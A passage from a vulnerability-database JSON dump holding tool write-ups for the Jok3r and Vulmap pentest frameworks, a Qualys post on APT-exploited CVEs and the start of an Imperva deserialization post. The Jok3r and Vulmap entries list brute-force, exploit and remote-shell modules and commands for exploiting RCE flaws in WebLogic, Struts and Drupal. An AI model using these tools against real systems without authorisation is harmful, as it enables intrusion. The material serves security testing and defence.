(CVE-2018-2893) | exploit-weblogic-cve2018-2893 |\n | weblogic-wls-wsat-cve2017-10271 | exploit | Exploit WLS-WSAT in Weblogic - CVE-2017-10271 | exploit-weblogic-cve2017-10271 |\n | drupal-cve-exploit | exploit | Check and exploit CVEs in CMS Drupal 7/8 (include Drupalgeddon2) (require user interaction) | drupwn |\n | bruteforce-domino | bruteforce | Bruteforce against IBM/Lotus Domino server | domiowned |\n | bruteforce-wordpress | bruteforce | Bruteforce Wordpress accounts | wpseku |\n | bruteforce-joomla | bruteforce | Bruteforce Joomla account | xbruteforcer |\n | bruteforce-drupal | bruteforce | Bruteforce Drupal account | xbruteforcer |\n | bruteforce-opencart | bruteforce | Bruteforce Opencart account | xbruteforcer |\n | bruteforce-magento | bruteforce | Bruteforce Magento account | xbruteforcer |\n | web-path-bruteforce-targeted | bruteforce | Bruteforce web paths when language is known (extensions adapted) (use raft wordlist) | dirsearch |\n | web-path-bruteforce-blind | bruteforce | Bruteforce web paths when language is unknown (use raft wordlist) | wfuzz |\n | web-path-bruteforce-opendoor | bruteforce | Bruteforce web paths using OWASP OpenDoor wordlist | wfuzz |\n | wordpress-shell-upload | postexploit | Upload shell on Wordpress if admin credentials are known | wpforce |\n +--------------------------------------+-------------+--------------------------------------------------------------------------------------------------+--------------------------------+\n\n[ ](<https://draft.blogger.com/null>) \n** Java-RMI (default 1099/tcp) ** \n\n \n \n +--------------------------------+-------------+--------------------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +--------------------------------+-------------+--------------------------------------------------------------------------------------------------------+----------------+\n | nmap-recon | recon | Attempt to dump all objects from Java-RMI service | nmap |\n | rmi-enum | recon | Enumerate RMI services | barmie |\n | jmx-info | recon | Get information about JMX and the MBean server | twiddle |\n | vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) | vuln-databases |\n | jmx-bruteforce | bruteforce | Bruteforce creds to connect to JMX registry | jmxbf |\n | exploit-rmi-default-config | exploit | Exploit default config in RMI Registry to load classes from any remote URL (not working against JMX) | metasploit |\n | exploit-jmx-insecure-config | exploit | Exploit JMX insecure config. Auth disabled: should be vuln. Auth enabled: vuln if weak config | metasploit |\n | jmx-auth-disabled-deploy-class | exploit | Deploy malicious MBean on JMX service with auth disabled (alternative to msf module) | sjet |\n | tomcat-jmxrmi-deserialize | exploit | Exploit Java-RMI deserialize in Tomcat (CVE-2016-8735, CVE-2016-8735), req. JmxRemoteLifecycleListener | jexboss |\n | rmi-deserialize-all-payloads | exploit | Attempt to exploit Java deserialize against Java RMI Registry with all ysoserial payloads | ysoserial |\n | tomcat-jmxrmi-manager-creds | postexploit | Retrieve Manager creds on Tomcat JMX (req. auth disabled or creds known on JMX) | jmxploit |\n +--------------------------------+-------------+--------------------------------------------------------------------------------------------------------+----------------+\n\n[ ](<https://draft.blogger.com/null>) \n** JDWP (default 9000/tcp) ** \n\n \n \n +------------+----------+-----------------------------------------------------+-----------------+\n | Name | Category | Description | Tool used |\n +------------+----------+-----------------------------------------------------+-----------------+\n | nmap-recon | recon | Recon using Nmap JDWP scripts | nmap |\n | jdwp-rce | exploit | Gain RCE on JDWP service (show OS/Java info as PoC) | jdwp-shellifier |\n +------------+----------+-----------------------------------------------------+-----------------+\n\n[ ](<https://draft.blogger.com/null>) \n** MSSQL (default 1433/tcp) ** \n\n \n \n +-----------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +-----------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n | nmap-recon | recon | Recon using Nmap MSSQL scripts | nmap |\n | mssqlinfo | recon | Get technical information about a remote MSSQL server (use TDS protocol and SQL browser Server) | msdat |\n | common-creds | bruteforce | Check common/default credentials on MSSQL server | msdat |\n | bruteforce-sa-account | bruteforce | Bruteforce MSSQL \"sa\" account | msdat |\n | audit-mssql-postauth | postexploit | Check permissive privileges, methods allowing command execution, weak accounts after authenticating on MSSQL | msdat |\n +-----------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n\n[ ](<https://draft.blogger.com/null>) \n** MySQL (default 3306/tcp) ** \n\n \n \n +----------------------------------+-------------+-------------------------------------------------------------------------+---------------+\n | Name | Category | Description | Tool used |\n +----------------------------------+-------------+-------------------------------------------------------------------------+---------------+\n | nmap-recon | recon | Recon using Nmap MySQL scripts | nmap |\n | mysql-auth-bypass-cve2012-2122 | exploit | Exploit password bypass vulnerability in MySQL - CVE-2012-2122 | metasploit |\n | default-creds | bruteforce | Check default credentials on MySQL server | patator |\n | mysql-hashdump | postexploit | Retrieve usernames and password hashes from MySQL database (req. creds) | metasploit |\n | mysql-interesting-tables-columns | postexploit | Search for interesting tables and columns in database | jok3r-scripts |\n +----------------------------------+-------------+-------------------------------------------------------------------------+---------------+\n\n[ ](<https://draft.blogger.com/null>) \n** Oracle (default 1521/tcp) ** \n\n \n \n +--------------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +--------------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n | tnscmd | recon | Connect to TNS Listener and issue commands Ping, Status, Version | odat |\n | tnspoisoning | vulnscan | Test if TNS Listener is vulnerable to TNS Poisoning (CVE-2012-1675) | odat |\n | common-creds | bruteforce | Check common/default credentials on Oracle server | odat |\n | bruteforce-creds | bruteforce | Bruteforce Oracle accounts (might block some accounts !) | odat |\n | audit-oracle-postauth | postexploit | Check for privesc vectors, config leading to command execution, weak accounts after authenticating on Oracle | odat |\n | search-columns-passwords | postexploit | Search for columns storing passwords in the database | odat |\n +--------------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n\n[ ](<https://draft.blogger.com/null>) \n** PostgreSQL (default 5432/tcp) ** \n\n \n \n +---------------+------------+------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +---------------+------------+------------------------------------------------+-----------+\n | default-creds | bruteforce | Check default credentials on PostgreSQL server | patator |\n +---------------+------------+------------------------------------------------+-----------+\n\n[ ](<https://draft.blogger.com/null>) \n** RDP (default 3389/tcp) ** \n\n \n \n +----------+----------+-----------------------------------------------------------------------+------------+\n | Name | Category | Description | Tool used |\n +----------+----------+-----------------------------------------------------------------------+------------+\n | ms12-020 | vulnscan | Check for MS12-020 RCE vulnerability (any Windows before 13 Mar 2012) | metasploit |\n +---------+----------+-----------------------------------------------------------------------+------------+\n\n[ ](<https://draft.blogger.com/null>) \n** SMB (default 445/tcp) ** \n\n \n \n +-----------------------------------+-------------+-------------------------------------------------------------------------------+------------+\n | Name | Category | Description | Tool used |\n +-----------------------------------+-------------+-------------------------------------------------------------------------------+------------+\n | nmap-recon | recon | Recon using Nmap SMB scripts | nmap |\n | anonymous-enum-smb | recon | Attempt to perform enum (users, shares...) without account | nullinux |\n | nmap-vulnscan | vulnscan | Check for vulns in SMB (MS17-010, MS10-061, MS10-054, MS08-067...) using Nmap | nmap |\n | detect-ms17-010 | vulnscan | Detect MS17-010 SMB RCE | metasploit |\n | samba-rce-cve2015-0240 | vulnscan | Detect RCE vuln (CVE-2015-0240) in Samba 3.5.x and 3.6.X | metasploit |\n | exploit-rce-ms08-067 | exploit | Exploit for RCE vuln MS08-067 on SMB | metasploit |\n | exploit-rce-ms17-010-eternalblue | exploit | Exploit for RCE vuln MS17-010 EternalBlue on SMB | metasploit |\n | exploit-sambacry-rce-cve2017-7494 | exploit | Exploit for SambaCry RCE on Samba <= 4.5.9 (CVE-2017-7494) | metasploit |\n | auth-enum-smb | postexploit | Authenticated enumeration (users, groups, shares) on SMB | nullinux |\n | auth-shares-perm | postexploit | Get R/W permissions on SMB shares | smbmap |\n | smb-exec | postexploit | Attempt to get a remote shell (psexec-like, requires Administrator creds) | impacket |\n +-----------------------------------+-------------+-------------------------------------------------------------------------------+------------+\n\n[ ](<https://draft.blogger.com/null>) \n** SMTP (default 25/tcp) ** \n\n \n \n +----------------+----------+--------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +----------------+----------+--------------------------------------------------------------------------------------------+----------------+\n | smtp-cve | vulnscan | Scan for vulnerabilities (CVE-2010-4344, CVE-2011-1720, CVE-2011-1764, open-relay) on SMTP | nmap |\n | smtp-user-enum | vulnscan | Attempt to perform user enumeration via SMTP commands EXPN, VRFY and RCPT TO | smtp-user-enum |\n +----------------+----------+--------------------------------------------------------------------------------------------+----------------+\n\n[ ](<https://draft.blogger.com/null>) \n** SNMP (default 161/udp) ** \n\n \n \n +--------------------------+-------------+---------------------------------------------------------------------+------------+\n | Name | Category | Description | Tool used |\n +--------------------------+-------------+---------------------------------------------------------------------+------------+\n | common-community-strings | bruteforce | Check common community strings on SNMP server | metasploit |\n | snmpv3-bruteforce-creds | bruteforce | Bruteforce SNMPv3 credentials | snmpwn |\n | enumerate-info | postexploit | Enumerate information provided by SNMP (and check for write access) | snmp-check |\n +--------------------------+-------------+---------------------------------------------------------------------+------------+\n\n[ ](<https://draft.blogger.com/null>) \n** SSH (default 22/tcp) ** \n\n \n \n +--------------------------------+------------+--------------------------------------------------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +--------------------------------+------------+--------------------------------------------------------------------------------------------+-----------+\n | vulns-algos-scan | vulnscan | Scan supported algorithms and security info on SSH server | ssh-audit |\n | user-enumeration-timing-attack | exploit | Try to perform OpenSSH (versions <= 7.2 and >= 5.*) user enumeration timing attack OpenSSH | osueta |\n | default-ssh-key | bruteforce | Try to authenticate on SSH server using known SSH keys | changeme |\n | default-creds | bruteforce | Check default credentials on SSH | patator |\n +--------------------------------+------------+--------------------------------------------------------------------------------------------+-----------+\n\n[ ](<https://draft.blogger.com/null>) \n** Telnet (default 21/tcp) ** \n\n \n \n +-------------------------+------------+----------------------------------------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +-------------------------+------------+----------------------------------------------------------------------------------+-----------+\n | nmap-recon | recon | Recon using Nmap Telnet scripts | nmap |\n | default-creds | bruteforce | Check default credentials on Telnet (dictionary from https://cirt.net/passwords) | patator |\n | bruteforce-root-account | bruteforce | Bruteforce \"root\" account on Telnet | patator |\n +-------------------------+------------+----------------------------------------------------------------------------------+-----------+\n\n[ ](<https://draft.blogger.com/null>) \n** VNC (default 5900/tcp) ** \n\n \n \n +-----------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +-----------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | nmap-recon | recon | Recon using Nmap VNC scripts | nmap |\n | vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) | vuln-databases |\n | bruteforce-pass | bruteforce | Bruteforce VNC password | patator |\n +-----------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n\n \n \n\n\n** [ Download Jok3R ](<https://github.com/koutto/jok3r>) **\n", "edition": 20, "modified": "2019-01-23T12:25:12", "published": "2019-01-23T12:25:12", "id": "KITPLOIT:5052987141331551837", "href": "http://www.kitploit.com/2019/01/jok3r-network-and-web-pentest-framework.html", "title": "Jok3R - Network And Web Pentest Framework", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-25T15:23:36", "bulletinFamily": "tools", "cvelist": ["CVE-2017-9791", "CVE-2020-2551", "CVE-2019-6340", "CVE-2011-3923", "CVE-2018-7600", "CVE-2013-1966", "CVE-2020-14882", "CVE-2020-2883", "CVE-2018-2894", "CVE-2018-20062", "CVE-2010-1428", "CVE-2019-7238", "CVE-2017-3506", "CVE-2013-2251", "CVE-2014-4210", "CVE-2017-12629", "CVE-2020-10199", "CVE-2019-0193", "CVE-2018-7602", "CVE-2015-7501", "CVE-2017-5638", "CVE-2017-10271", "CVE-2018-11776", "CVE-2017-12615", "CVE-2019-0230", "CVE-2010-1870", "CVE-2016-4437", "CVE-2017-9805", "CVE-2020-2729", "CVE-2013-2134", "CVE-2020-1938", "CVE-2019-9082", "CVE-2019-2725", "CVE-2010-0738", "CVE-2018-1000861", "CVE-2019-17558", "CVE-2017-1000353", "CVE-2016-3081", "CVE-2020-2555", "CVE-2019-2729"], "description": "[  ](<https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s678/vulmap.png>)\n\n \n\n\nVulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability actually exists. \n\nVulmap currently has vulnerability scanning (poc) and exploiting (exp) modes. Use \"-m\" to select which mode to use, and the default poc mode is the default. In poc mode, it also supports \"-f\" batch target scanning, \"-o\" File output results and other main functions, Other functions [ Options ](<https://github.com/zhzyker/vulmap/#options>) Or python3 vulmap.py -h, the Poc function will no longer be provided in the exploit exploit mode, but the exploit will be carried out directly, and the exploit result will be fed back to further verify whether the vulnerability exists and whether it can be exploited. \n\n** Try to use \"-a\" to establish target types to reduce false positives, such as \"-a solr\" **\n\n \n\n\n### Installation \n\nThe operating system must have python3, python3.7 or higher is recommended \n\n * Installation dependency \n \n \n pip3 install -r requirements.txt\n \n\n * Linux & MacOS & Windows \n \n \n python3 vulmap.py -u http://example.com\n \n\n \n\n\n### Options \n \n \n optional arguments:\n -h, --help show this help message and exit\n -u URL, --url URL Target URL (e.g. -u \"http://example.com\")\n -f FILE, --file FILE Select a target list file, and the url must be distinguished by lines (e.g. -f \"/home/user/list.txt\")\n -m MODE, --mode MODE The mode supports \"poc\" and \"exp\", you can omit this option, and enter poc mode by default\n -a APP, --app APP Specify a web app or cms (e.g. -a \"weblogic\"). default scan all\n -c CMD, --cmd CMD Custom RCE vuln command, Other than \"netstat -an\" and \"id\" can affect program judgment. defautl is \"netstat -an\"\n -v VULN, --vuln VULN Exploit, Specify the vuln number (e.g. -v \"CVE-2020-2729\")\n --list Displays a list of vulnerabilities that support scanning\n --debug Debug mode echo request and responses\n --delay DELAY Delay check time, default 0s\n --timeout TIMEOUT Scan timeout time, default 10s\n --output FILE Text mode export (e.g. -o \"result.txt\")\n \n\n \n\n\n### Examples \n\nTest all vulnerabilities poc mode \n \n \n python3 vulmap.py -u http://example.com\n \n\nFor RCE vuln, use the \"id\" command to test the vuln, because some linux does not have the \"netstat -an\" command \n \n \n python3 vulmap.py -u http://example.com -c \"id\"\n \n\nCheck [ http://example.com ](<http://example.com>) for struts2 vuln \n \n \n python3 vulmap.py -u http://example.com -a struts2\n \n \n \n python3 vulmap.py -u http://example.com -m poc -a struts2\n \n\nExploit the CVE-2019-2729 vuln of WebLogic on [ http://example.com:7001 ](<http://example.com:7001>)\n \n \n python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n \n \n \n python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729\n \n\nBatch scan URLs in list.txt \n \n \n python3 vulmap.py -f list.txt\n \n\nExport scan results to result.txt \n \n \n python3 vulmap.py -u http://example.com:7001 -o result.txt\n \n\n \n\n\n### Vulnerabilitys List \n\nVulmap supported vulnerabilities are as follows \n \n \n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |\n | Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here |\n | Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |\n | Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |\n | Apache Struts2 | S2-005 | Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |\n | Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |\n | Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce |\n | Apache Struts2 | S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |\n | Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |\n | Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |\n | Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |\n | Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |\n | Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |\n | Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |\n | Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |\n | Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |\n | Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |\n | Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |\n | Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |\n | Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |\n | Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |\n | Drupal | CVE-2018-7602 | Y | Y | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |\n | Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |\n | Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution |\n | Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |\n | Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability |\n | Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 3.21.1, remote code execution vulnerability |\n | Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |\n | Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, deserialization any file upload |\n | Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |\n | Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |\n | RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |\n | RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |\n | RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |\n | ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce |\n | ThinkPHP | CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n \n\n \n\n\n### Docker \n \n \n docker build -t vulmap/vulmap .\n docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com\n\n \n\n\n \n \n\n\n** [ Download Vulmap ](<https://github.com/zhzyker/vulmap> \"Download Vulmap\" ) **\n", "edition": 1, "modified": "2020-12-25T11:30:06", "published": "2020-12-25T11:30:06", "id": "KITPLOIT:5420210148456420402", "href": "http://www.kitploit.com/2020/12/vulmap-web-vulnerability-scanning-and.html", "title": "Vulmap - Web Vulnerability Scanning And Verification Tools", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2019-12-27T19:32:53", "bulletinFamily": "blog", "cvelist": ["CVE-2012-0158", "CVE-2017-0143", "CVE-2017-0199", "CVE-2017-10271", "CVE-2017-11882", "CVE-2017-5638", "CVE-2017-5715", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-10561", "CVE-2018-12130", "CVE-2018-20250", "CVE-2018-4878", "CVE-2018-7600", "CVE-2018-8174", "CVE-2019-0708", "CVE-2019-2725", "CVE-2019-3396"], "description": "[A recent report](<https://www.darkreading.com/threat-intelligence/20-vulnerabilities-to-prioritize-patching-before-2020/d/d-id/1336691>) identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advance Persistent Threat (APT) actors from all parts of the world.\n\nThe list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.\n\n**No.** | **CVE** | **Products Affected by CVE** | **CVSS Score (NVD)** | **Examples of Threat Actors** \n---|---|---|---|--- \n**1** | CVE-2017-11882 | Microsoft Office | 7.8 | APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia) \n**2** | CVE-2018-8174 | Microsoft Windows | 7.5 | Silent Group (Russia), Dark Hotel APT (North Korea) \n**3** | CVE-2017-0199 | Microsoft Office, Windows | 7.8 | APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Gorgon Group (Pakistan), Gaza Cybergang (Iran) \n**4** | CVE-2018-4878 | Adobe Flash Player, Red Hat Enterprise Linux | 9.8 | APT37 (North Korea), Lazarus Group (North Korea) \n**5** | CVE-2017-10271 | Oracle WebLogic Server | 7.5 | Rocke Gang (Chinese Cybercrime) \n**6** | CVE-2019-0708 | Microsoft Windows | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**7** | CVE-2017-5638 | Apache Struts | 10 | Lazarus Group (North Korea) \n**8** | CVE-2017-5715 | ARM, Intel | 5.6 | Unknown \n**9** | CVE-2017-8759 | Microsoft .net Framework | 7.8 | APT40 (China), Cobalt Group (Spain, Ukraine), APT10 (China) \n**10** | CVE-2018-20250 | RARLAB WinRAR | 7.8 | APT32 (Vietnam), APT33 (Iran), APT-C-27 (Iran), Lazarus Group (North Korea), MuddyWater APT (Iran) \n**11** | CVE-2018-7600 | Debian, Drupal | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru), Sea Turtle (Iran) \n**12** | CVE-2018-10561 | DASAN Networks | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**13** | CVE-2012-0158 | Microsoft | N/A; 9.3* | APT28 (Russia), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Lotus Blossom (China), Goblin Panda (China), Gorgon Group (Pakistan), APT40 (China) \n**14** | CVE-2017-8570 | Microsoft Office | 7.8 | APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT23 (China) \n**15** | CVE-2018-0802 | Microsoft Office | 7.8 | Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Cloud Atlas (Unknown), Cobalt Group (Spain, Ukraine), Goblin Panda (China), APT23 (China), APT27 (China), Rancor Group (China), Temp.Trident (China) \n**16** | CVE-2017-0143 | Microsoft SMB | 8.1 | APT3 (China), Calypso (China) \n**17** | CVE-2018-12130 | Fedora | 5.6 | Iron Tiger (China), APT3 (China), Calypso (China) \n**18** | CVE-2019-2725 | Oracle WebLogic Server | 9.8 | Panda (China) \n**19** | CVE-2019-3396 | Atlassian Confluence | 9.8 | APT41 (China), Rocke Gang (Chinese Cybercrime) \n \n* according to [cvedetails.com](<http://cvedetails.com/>)\n\n### Detecting the Top 19 CVEs\n\nQualys has detections (QIDs) for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that cover authenticated and remotely detected vulnerabilities supported by Qualys scanners and [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>).\n\nTo return a list of all impacted hosts, use the following QQL query within the VM Dashboard:\n \n \n vulnerabilities.vulnerability.cveIds:[CVE-2017-11882, CVE-2018-8174, CVE-2017-0199, CVE-2018-4878, CVE-2017-10271, CVE-2019-0708, CVE-2017-5638, CVE-2017-5715, CVE-2017-8759, CVE-2018-20250, CVE-2018-7600, CVE-2018-10561, CVE-2012-0158, CVE-2017-8570, CVE-2018-0802, CVE-2017-0143, CVE-2018-12130, CVE-2019-2725, CVE-2019-3396]\n\nYou can [import the following dashboard to track all 19 CVEs](<https://discussions.qualys.com/docs/DOC-7032>) as shown in the template below:\n\n[](<https://discussions.qualys.com/docs/DOC-7032>)\n\n### Alerts\n\nThe Qualys Cloud Platform enables you to continuously monitor for vulnerabilities and misconfigurations and get alerted for your most critical assets.\n\nSee how to set up [notifications for new and updated QIDs](<https://www.qualys.com/docs/version/8.21/qualys-vulnerability-notification.pdf>).\n\n### Tracking Per-Year Environment Impact and Remediation\n\nThe Qualys visualization team has included a Per-Year Environment Insight View Dashboard for easy tracking and remediation. This dashboard has been included in release 2.42 and can be found within the dashboard templates library. It will automatically show your systems whether scanned internally, externally or on remote mobile computers with the groundbreaking Qualys Cloud Agent.\n\n\n\nThis Per-Year Environment Insight View Dashboard will display data per year based on First Found date, followed by Vulnerability Status, Severity, Compliance, Real-Time Threat Intelligence (RTI)s from [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>), and Vulnerability Published Dates, allowing for an easy glance across your environment.\n\n\n\n \n\n### Get Started Now\n\nTo start detecting and remediating these vulnerabilities now, get a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/>).\n\nVisit the [Qualys Community](<https://community.qualys.com/docs/DOC-6785>) to download other dashboards created by your SMEs and Product Management team and import them into your subscription for further data insights.", "modified": "2019-12-27T18:01:22", "published": "2019-12-27T18:01:22", "id": "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "href": "https://blog.qualys.com/technology/2019/12/27/top-19-vulnerability-cves-in-santas-dashboard-tracking", "type": "qualysblog", "title": "Top 19+ Vulnerability CVEs in Santa\u2019s Dashboard Tracking", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2018-01-25T09:59:26", "bulletinFamily": "blog", "cvelist": ["CVE-2012-4858", "CVE-2015-3253", "CVE-2015-4852", "CVE-2015-5254", "CVE-2015-5348", "CVE-2015-6420", "CVE-2015-6555", "CVE-2015-6576", "CVE-2015-6934", "CVE-2015-7253", "CVE-2015-7450", "CVE-2015-7501", "CVE-2015-8103", "CVE-2015-8237", "CVE-2015-8238", "CVE-2015-8360", "CVE-2015-8545", "CVE-2015-8581", "CVE-2015-8765", "CVE-2016-0714", "CVE-2016-0779", "CVE-2016-0788", "CVE-2016-0958", "CVE-2016-1291", "CVE-2016-1487", "CVE-2016-1985", "CVE-2016-1986", "CVE-2016-1997", "CVE-2016-1998", "CVE-2016-1999", "CVE-2016-2000", "CVE-2016-2003", "CVE-2016-2170", "CVE-2016-2173", "CVE-2016-2510", "CVE-2016-3415", "CVE-2016-3427", "CVE-2016-3461", "CVE-2016-3642", "CVE-2016-4372", "CVE-2016-4385", "CVE-2016-5004", "CVE-2016-5229", "CVE-2016-6809", "CVE-2016-7462", "CVE-2016-8735", "CVE-2016-8744", "CVE-2016-8749", "CVE-2016-9299", "CVE-2016-9606", "CVE-2017-1000353", "CVE-2017-10271", "CVE-2017-11283", "CVE-2017-11284", "CVE-2017-12149", "CVE-2017-2608", "CVE-2017-3066", "CVE-2017-3159", "CVE-2017-5586", "CVE-2017-5638", "CVE-2017-5641", "CVE-2017-5645", "CVE-2017-5878", "CVE-2017-7504", "CVE-2017-9805", "CVE-2017-9830", "CVE-2017-9844"], "description": "Imperva\u2019s research group is constantly monitoring new web application vulnerabilities. In doing so, we\u2019ve noticed at least four major insecure deserialization vulnerabilities that were published in the past year.\n\nOur analysis shows that, in the past three months, the number of deserialization attacks has grown by 300 percent on average, turning them into a serious security risk to web applications.\n\nTo make things worse, many of these attacks are now launched with the intent of installing crypto-mining malware on vulnerable web servers, which gridlocks their CPU usage.\n\nIn this blog post we will explain what insecure deserialization vulnerabilities are, show the growing trend of attacks exploiting these 